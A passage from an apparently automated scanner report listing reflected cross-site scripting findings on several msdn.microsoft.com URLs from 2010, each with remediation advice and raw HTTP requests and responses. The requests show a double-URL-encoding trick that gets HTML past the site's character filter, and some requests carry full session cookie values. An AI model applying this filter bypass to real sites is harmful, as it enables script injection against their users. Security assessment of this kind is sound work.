Remediation detail

The application should not URL-decode the value of REST URL parameter 1 a second time: the web server has already decoded it once, and the extra decode is what turns the %2522 and %253c sequences that slipped past the character filter into a literal quote and angle bracket. Input validation must run after all custom canonicalisation is complete, and the value must be HTML-attribute-encoded at the point where it is written into the fromPage hidden input on the error page.

Request

GET /en-usce0fb%2522%253e%253ca%253e210aa7e2390/library/ee663300(VS.85 HTTP/1.1
Host: msdn.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=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&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 9211
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 18:15:54 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met
...[SNIP]...
<input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-usce0fb"><a>210aa7e2390/library/ee663300(VS.85" />
...[SNIP]...

2.85. http://msdn.microsoft.com/en-us/library/ee663300(VS.85 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://msdn.microsoft.com
Path:   /en-us/library/ee663300(VS.85

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4583f%2522%253e%253ca%253e3ce016e5681 was submitted in the REST URL parameter 2. This input was echoed as 4583f"><a>3ce016e5681 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /en-us/library4583f%2522%253e%253ca%253e3ce016e5681/ee663300(VS.85 HTTP/1.1
Host: msdn.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ...[SNIP]...

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 9211
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 18:16:03 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met
...[SNIP]...
<input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/library4583f"><a>3ce016e5681/ee663300(VS.85" />
...[SNIP]...

2.86. http://msdn.microsoft.com/en-us/library/ee663300(VS.85 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://msdn.microsoft.com
Path:   /en-us/library/ee663300(VS.85

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 17e66%2522%253e%253ca%253e75a4d87b1f0 was submitted in the REST URL parameter 3. This input was echoed as 17e66"><a>75a4d87b1f0 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /en-us/library/ee663300(VS.8517e66%2522%253e%253ca%253e75a4d87b1f0 HTTP/1.1
Host: msdn.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ...[SNIP]...

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 9211
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 18:16:11 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met
...[SNIP]...
<input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/library/ee663300(VS.8517e66"><a>75a4d87b1f0" />
...[SNIP]...

2.87. http://msdn.microsoft.com/en-us/library/ee663300(VS.85).aspx [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://msdn.microsoft.com
Path:   /en-us/library/ee663300(VS.85).aspx

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f03f2%2522%253e%253ca%253e020d19f1e98 was submitted in the REST URL parameter 1. This input was echoed as f03f2"><a>020d19f1e98 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /en-usf03f2%2522%253e%253ca%253e020d19f1e98/library/ee663300(VS.85).aspx HTTP/1.1
Host: msdn.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ...[SNIP]...

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 9213
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 18:14:43 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met
...[SNIP]...
<input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-usf03f2"><a>020d19f1e98/library/ee663300(VS.85)" />
...[SNIP]...

2.88. http://msdn.microsoft.com/en-us/library/ee663300(VS.85).aspx [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://msdn.microsoft.com
Path:   /en-us/library/ee663300(VS.85).aspx

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9d063%2522%253e%253ca%253e98b4bfeb5d1 was submitted in the REST URL parameter 2. This input was echoed as 9d063"><a>98b4bfeb5d1 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /en-us/library9d063%2522%253e%253ca%253e98b4bfeb5d1/ee663300(VS.85).aspx HTTP/1.1
Host: msdn.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ...[SNIP]...

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 9213
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 18:14:57 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met
...[SNIP]...
<input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/library9d063"><a>98b4bfeb5d1/ee663300(VS.85)" />
...[SNIP]...

2.89. http://msdn.microsoft.com/en-us/library/ee663300(VS.85).aspx [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://msdn.microsoft.com
Path:   /en-us/library/ee663300(VS.85).aspx

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fa396%2522%253e%253ca%253eddc59ddb169 was submitted in the REST URL parameter 3. This input was echoed as fa396"><a>ddc59ddb169 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /en-us/library/ee663300(VS.85).aspxfa396%2522%253e%253ca%253eddc59ddb169 HTTP/1.1
Host: msdn.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ...[SNIP]...

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 9223
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 18:15:11 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met
...[SNIP]...
<input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/library/ee663300(VS.85).aspxfa396"><a>ddc59ddb169" />
...[SNIP]...

2.90. http://msdn.microsoft.com/en-us/library/ee702802.aspx [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://msdn.microsoft.com
Path:   /en-us/library/ee702802.aspx

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 66b35%2522%253e%253ca%253e93ed8ded15d was submitted in the REST URL parameter 1. This input was echoed as 66b35"><a>93ed8ded15d in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /en-us66b35%2522%253e%253ca%253e93ed8ded15d/library/ee702802.aspx HTTP/1.1
Host: msdn.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ...[SNIP]...

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 9199
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 18:14:00 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met
...[SNIP]...
<input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us66b35"><a>93ed8ded15d/library/ee702802" />
...[SNIP]...

2.91. http://msdn.microsoft.com/en-us/library/ee702802.aspx [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://msdn.microsoft.com
Path:   /en-us/library/ee702802.aspx

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a5f19%2522%253e%253ca%253e937c58c4d40 was submitted in the REST URL parameter 2. This input was echoed as a5f19"><a>937c58c4d40 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /en-us/librarya5f19%2522%253e%253ca%253e937c58c4d40/ee702802.aspx HTTP/1.1
Host: msdn.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ...[SNIP]...

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 9199
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 18:14:14 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met
...[SNIP]...
<input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/librarya5f19"><a>937c58c4d40/ee702802" />
...[SNIP]...

2.92. http://msdn.microsoft.com/en-us/library/ee702802.aspx [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://msdn.microsoft.com
Path:   /en-us/library/ee702802.aspx

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7cc52%2522%253e%253ca%253edf492255170 was submitted in the REST URL parameter 3. This input was echoed as 7cc52"><a>df492255170 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /en-us/library/ee702802.aspx7cc52%2522%253e%253ca%253edf492255170 HTTP/1.1
Host: msdn.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=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&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 9209
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 18:14:29 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met
...[SNIP]...
<input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/library/ee702802.aspx7cc52"><a>df492255170" />
...[SNIP]...

2.93. http://msdn.microsoft.com/en-us/library/ee721044.aspx [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://msdn.microsoft.com
Path:   /en-us/library/ee721044.aspx

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload aa9e1%2522%253e%253ca%253e80d9957f887 was submitted in the REST URL parameter 1. This input was echoed as aa9e1"><a>80d9957f887 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /en-usaa9e1%2522%253e%253ca%253e80d9957f887/library/ee721044.aspx HTTP/1.1
Host: msdn.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=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&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 